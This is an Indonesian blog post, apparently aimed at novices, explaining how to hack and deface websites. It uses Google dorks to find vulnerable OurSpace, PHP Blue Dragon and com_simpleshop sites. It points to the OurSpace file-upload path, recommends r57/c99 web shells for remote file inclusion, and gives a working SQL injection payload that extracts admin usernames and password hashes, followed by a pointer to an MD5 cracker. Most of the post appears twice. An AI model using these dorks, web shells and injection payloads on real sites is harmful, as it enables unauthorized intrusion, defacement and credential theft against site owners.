Ok, di posting saya kali ini, saya akan mengulas lagi bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,
pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami,
pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
- Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
- Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
- Code:
- http://milw0rm.com/exploits/1779 - http://milw0rm.com/exploits/1913 - http://milw0rm.com/exploits/4276
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
- Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami,
3 komentar:
kk bikin tampilan blog kya gini gmn?
gampang .
tar abang kirim deh template nyah lewat e-mail .
e-mail km nyah apah?
mau nambahin tutorial hacking tools dan ebook, langsung saja ke http://www.hacking-booktools.blogspot.com/
Posting Komentar